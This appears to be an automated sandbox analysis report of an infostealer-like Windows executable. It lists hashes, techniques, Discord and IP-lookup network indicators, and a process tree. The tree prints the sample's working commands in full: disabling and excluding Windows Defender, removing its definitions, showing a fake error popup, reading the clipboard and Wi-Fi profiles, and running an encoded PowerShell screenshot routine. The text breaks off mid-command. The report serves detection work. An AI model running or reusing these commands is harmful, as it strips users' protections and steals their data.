Analysis
-
max time kernel
97s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 01:50
Behavioral task
behavioral1
Sample
TRAGICPOOPEXE.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
TRAGICPOOPEXE.exe
Resource
win10v2004-20241007-en
General
-
Target
TRAGICPOOPEXE.exe
-
Size
5.9MB
-
MD5
dfa189c79f54bcbf8ce3bc6532b92778
-
SHA1
68e1e70d9fdf3a53cb0aefbc31536fc16e9efa98
-
SHA256
d21b3b16905c598240ce7d21a84e3c792ae1f265203c0cb8ad1cd705cbd775d3
-
SHA512
9b7d980861d200dc8e8b50150974e6fb370acea704ae03af92478d65a2e68d3b6faa81e3b5e9ee639bc25fb2b27be9178cd3651877baf6086b3e99adb0bd5e3a
-
SSDEEP
98304:gbmoDUN43WQqHejOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6attMLP:gbumWQzOjmFwDRxtYSHdK34kdai7bN3J
Malware Config
Signatures
-
pid Process 4536 powershell.exe 3144 powershell.exe 2900 powershell.exe 952 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts TRAGICPOOPEXE.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2748 cmd.exe 2684 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4892 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe 2228 TRAGICPOOPEXE.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 discord.com 27 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ip-api.com 22 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 5040 tasklist.exe 2436 tasklist.exe 3892 tasklist.exe 4180 tasklist.exe 3028 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b89-21.dat upx behavioral2/memory/2228-25-0x00007FFB68530000-0x00007FFB68996000-memory.dmp upx behavioral2/files/0x000a000000023b7c-27.dat upx behavioral2/memory/2228-30-0x00007FFB7B9E0000-0x00007FFB7BA04000-memory.dmp upx behavioral2/files/0x000a000000023b83-48.dat upx behavioral2/files/0x000a000000023b82-47.dat upx behavioral2/files/0x000a000000023b81-46.dat upx behavioral2/files/0x000a000000023b80-45.dat upx behavioral2/files/0x000a000000023b7f-44.dat upx behavioral2/files/0x000a000000023b7e-43.dat upx behavioral2/files/0x000a000000023b7d-42.dat upx behavioral2/files/0x000a000000023b7b-41.dat upx behavioral2/files/0x000a000000023b8e-40.dat upx behavioral2/files/0x000a000000023b8d-39.dat upx behavioral2/files/0x000a000000023b8c-38.dat upx behavioral2/memory/2228-35-0x00007FFB7D270000-0x00007FFB7D27F000-memory.dmp upx behavioral2/files/0x000a000000023b88-34.dat upx behavioral2/files/0x000a000000023b86-33.dat upx behavioral2/files/0x000a000000023b87-31.dat upx behavioral2/memory/2228-54-0x00007FFB78120000-0x00007FFB7814C000-memory.dmp upx behavioral2/memory/2228-58-0x00007FFB780E0000-0x00007FFB780FF000-memory.dmp upx behavioral2/memory/2228-56-0x00007FFB78100000-0x00007FFB78118000-memory.dmp upx behavioral2/memory/2228-60-0x00007FFB681C0000-0x00007FFB6833A000-memory.dmp upx behavioral2/memory/2228-66-0x00007FFB779C0000-0x00007FFB779EE000-memory.dmp upx behavioral2/memory/2228-65-0x00007FFB780D0000-0x00007FFB780DD000-memory.dmp upx behavioral2/memory/2228-64-0x00007FFB779F0000-0x00007FFB77A09000-memory.dmp upx behavioral2/memory/2228-72-0x00007FFB67E40000-0x00007FFB681B9000-memory.dmp upx behavioral2/memory/2228-71-0x00007FFB68530000-0x00007FFB68996000-memory.dmp upx behavioral2/memory/2228-68-0x00007FFB68F40000-0x00007FFB68FF8000-memory.dmp upx behavioral2/memory/2228-74-0x00007FFB7B9E0000-0x00007FFB7BA04000-memory.dmp upx behavioral2/memory/2228-78-0x00007FFB78030000-0x00007FFB7803D000-memory.dmp upx behavioral2/memory/2228-80-0x00007FFB67D20000-0x00007FFB67E38000-memory.dmp upx behavioral2/memory/2228-77-0x00007FFB777E0000-0x00007FFB777F5000-memory.dmp upx behavioral2/memory/2228-100-0x00007FFB780E0000-0x00007FFB780FF000-memory.dmp upx behavioral2/memory/2228-107-0x00007FFB681C0000-0x00007FFB6833A000-memory.dmp upx behavioral2/memory/2228-109-0x00007FFB779C0000-0x00007FFB779EE000-memory.dmp upx behavioral2/memory/2228-108-0x00007FFB779F0000-0x00007FFB77A09000-memory.dmp upx behavioral2/memory/2228-211-0x00007FFB68F40000-0x00007FFB68FF8000-memory.dmp upx behavioral2/memory/2228-253-0x00007FFB67E40000-0x00007FFB681B9000-memory.dmp upx behavioral2/memory/2228-268-0x00007FFB68530000-0x00007FFB68996000-memory.dmp upx behavioral2/memory/2228-277-0x00007FFB779C0000-0x00007FFB779EE000-memory.dmp upx behavioral2/memory/2228-274-0x00007FFB681C0000-0x00007FFB6833A000-memory.dmp upx behavioral2/memory/2228-273-0x00007FFB780E0000-0x00007FFB780FF000-memory.dmp upx behavioral2/memory/2228-269-0x00007FFB7B9E0000-0x00007FFB7BA04000-memory.dmp upx behavioral2/memory/2228-307-0x00007FFB68530000-0x00007FFB68996000-memory.dmp upx behavioral2/memory/2228-335-0x00007FFB67D20000-0x00007FFB67E38000-memory.dmp upx behavioral2/memory/2228-334-0x00007FFB78030000-0x00007FFB7803D000-memory.dmp upx behavioral2/memory/2228-333-0x00007FFB777E0000-0x00007FFB777F5000-memory.dmp upx behavioral2/memory/2228-332-0x00007FFB67E40000-0x00007FFB681B9000-memory.dmp upx behavioral2/memory/2228-331-0x00007FFB68F40000-0x00007FFB68FF8000-memory.dmp upx behavioral2/memory/2228-330-0x00007FFB779C0000-0x00007FFB779EE000-memory.dmp upx behavioral2/memory/2228-329-0x00007FFB780D0000-0x00007FFB780DD000-memory.dmp upx behavioral2/memory/2228-328-0x00007FFB779F0000-0x00007FFB77A09000-memory.dmp upx behavioral2/memory/2228-327-0x00007FFB681C0000-0x00007FFB6833A000-memory.dmp upx behavioral2/memory/2228-326-0x00007FFB780E0000-0x00007FFB780FF000-memory.dmp upx behavioral2/memory/2228-325-0x00007FFB78100000-0x00007FFB78118000-memory.dmp upx behavioral2/memory/2228-324-0x00007FFB78120000-0x00007FFB7814C000-memory.dmp upx behavioral2/memory/2228-323-0x00007FFB7D270000-0x00007FFB7D27F000-memory.dmp upx behavioral2/memory/2228-322-0x00007FFB7B9E0000-0x00007FFB7BA04000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 452 cmd.exe 4472 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4884 WMIC.exe 1980 WMIC.exe 2992 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1152 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 4536 powershell.exe 4536 powershell.exe 952 powershell.exe 952 powershell.exe 952 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe 4316 powershell.exe 4316 powershell.exe 2900 powershell.exe 2900 powershell.exe 2636 powershell.exe 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4536 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeDebugPrivilege 3892 tasklist.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeIncreaseQuotaPrivilege 4884 WMIC.exe Token: SeSecurityPrivilege 4884 WMIC.exe Token: SeTakeOwnershipPrivilege 4884 WMIC.exe Token: SeLoadDriverPrivilege 4884 WMIC.exe Token: SeSystemProfilePrivilege 4884 WMIC.exe Token: SeSystemtimePrivilege 4884 WMIC.exe Token: SeProfSingleProcessPrivilege 4884 WMIC.exe Token: SeIncBasePriorityPrivilege 4884 WMIC.exe Token: SeCreatePagefilePrivilege 4884 WMIC.exe Token: SeBackupPrivilege 4884 WMIC.exe Token: SeRestorePrivilege 4884 WMIC.exe Token: SeShutdownPrivilege 4884 WMIC.exe Token: SeDebugPrivilege 4884 WMIC.exe Token: SeSystemEnvironmentPrivilege 4884 WMIC.exe Token: SeRemoteShutdownPrivilege 4884 WMIC.exe Token: SeUndockPrivilege 4884 WMIC.exe Token: SeManageVolumePrivilege 4884 WMIC.exe Token: 33 4884 WMIC.exe Token: 34 4884 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2808 wrote to memory of 2228 2808 TRAGICPOOPEXE.exe 85 PID 2808 wrote to memory of 2228 2808 TRAGICPOOPEXE.exe 85 PID 2228 wrote to memory of 3436 2228 TRAGICPOOPEXE.exe 86 PID 2228 wrote to memory of 3436 2228 TRAGICPOOPEXE.exe 86 PID 2228 wrote to memory of 3852 2228 TRAGICPOOPEXE.exe 87 PID 2228 wrote to memory of 3852 2228 TRAGICPOOPEXE.exe 87 PID 2228 wrote to memory of 2268 2228 TRAGICPOOPEXE.exe 88 PID 2228 wrote to memory of 2268 2228 TRAGICPOOPEXE.exe 88 PID 2228 wrote to memory of 440 2228 TRAGICPOOPEXE.exe 92 PID 2228 wrote to memory of 440 2228 TRAGICPOOPEXE.exe 92 PID 2228 wrote to memory of 4904 2228 TRAGICPOOPEXE.exe 94 PID 2228 wrote to memory of 4904 2228 TRAGICPOOPEXE.exe 94 PID 3436 wrote to memory of 952 3436 cmd.exe 96 PID 3436 wrote to memory of 952 3436 cmd.exe 96 PID 3852 wrote to memory of 4536 3852 cmd.exe 98 PID 3852 wrote to memory of 4536 3852 cmd.exe 98 PID 2268 wrote to memory of 628 2268 cmd.exe 97 PID 2268 wrote to memory of 628 2268 cmd.exe 97 PID 4904 wrote to memory of 4928 4904 cmd.exe 100 PID 4904 wrote to memory of 4928 4904 cmd.exe 100 PID 440 wrote to memory of 3892 440 cmd.exe 99 PID 440 wrote to memory of 3892 440 cmd.exe 99 PID 2228 wrote to memory of 4244 2228 TRAGICPOOPEXE.exe 102 PID 2228 wrote to memory of 4244 2228 TRAGICPOOPEXE.exe 102 PID 4244 wrote to memory of 3476 4244 cmd.exe 104 PID 4244 wrote to memory of 3476 4244 cmd.exe 104 PID 2228 wrote to memory of 4552 2228 TRAGICPOOPEXE.exe 105 PID 2228 wrote to memory of 4552 2228 TRAGICPOOPEXE.exe 105 PID 4552 wrote to memory of 5008 4552 cmd.exe 107 PID 4552 wrote to memory of 5008 4552 cmd.exe 107 PID 2228 wrote to memory of 1388 2228 TRAGICPOOPEXE.exe 108 PID 2228 wrote to memory of 1388 2228 TRAGICPOOPEXE.exe 108 PID 1388 wrote to memory of 4884 1388 cmd.exe 110 PID 1388 wrote to memory of 4884 1388 cmd.exe 110 PID 2228 wrote to memory of 2300 2228 TRAGICPOOPEXE.exe 111 PID 2228 wrote to memory of 2300 2228 TRAGICPOOPEXE.exe 111 PID 2300 wrote to memory of 1980 2300 cmd.exe 113 PID 2300 wrote to memory of 1980 2300 cmd.exe 113 PID 2228 wrote to memory of 1680 2228 TRAGICPOOPEXE.exe 114 PID 2228 wrote to memory of 1680 2228 TRAGICPOOPEXE.exe 114 PID 2228 wrote to memory of 3964 2228 TRAGICPOOPEXE.exe 115 PID 2228 wrote to memory of 3964 2228 TRAGICPOOPEXE.exe 115 PID 2228 wrote to memory of 4400 2228 TRAGICPOOPEXE.exe 118 PID 2228 wrote to memory of 4400 2228 TRAGICPOOPEXE.exe 118 PID 1680 wrote to memory of 4180 1680 cmd.exe 120 PID 1680 wrote to memory of 4180 1680 cmd.exe 120 PID 3964 wrote to memory of 3028 3964 cmd.exe 121 PID 3964 wrote to memory of 3028 3964 cmd.exe 121 PID 4400 wrote to memory of 872 4400 cmd.exe 122 PID 4400 wrote to memory of 872 4400 cmd.exe 122 PID 2228 wrote to memory of 2748 2228 TRAGICPOOPEXE.exe 123 PID 2228 wrote to memory of 2748 2228 TRAGICPOOPEXE.exe 123 PID 2228 wrote to memory of 2824 2228 TRAGICPOOPEXE.exe 125 PID 2228 wrote to memory of 2824 2228 TRAGICPOOPEXE.exe 125 PID 2748 wrote to memory of 2684 2748 cmd.exe 127 PID 2748 wrote to memory of 2684 2748 cmd.exe 127 PID 2228 wrote to memory of 400 2228 TRAGICPOOPEXE.exe 128 PID 2228 wrote to memory of 400 2228 TRAGICPOOPEXE.exe 128 PID 2228 wrote to memory of 452 2228 TRAGICPOOPEXE.exe 129 PID 2228 wrote to memory of 452 2228 TRAGICPOOPEXE.exe 129 PID 2228 wrote to memory of 2032 2228 TRAGICPOOPEXE.exe 165 PID 2228 wrote to memory of 2032 2228 TRAGICPOOPEXE.exe 165 PID 2228 wrote to memory of 4012 2228 TRAGICPOOPEXE.exe 132 PID 2228 wrote to memory of 4012 2228 TRAGICPOOPEXE.exe 132 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2088 attrib.exe 2756 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\TRAGICPOOPEXE.exe"C:\Users\Admin\AppData\Local\Temp\TRAGICPOOPEXE.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\TRAGICPOOPEXE.exe"C:\Users\Admin\AppData\Local\Temp\TRAGICPOOPEXE.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TRAGICPOOPEXE.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TRAGICPOOPEXE.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('you dont have the correct version of python installed. required version: 3.10.11', 0, 'uh oh', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('you dont have the correct version of python installed. required version: 3.10.11', 0, 'uh oh', 48+16);close()"4⤵PID:628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:5008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2824
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:400
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:452 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4012
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2032
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlA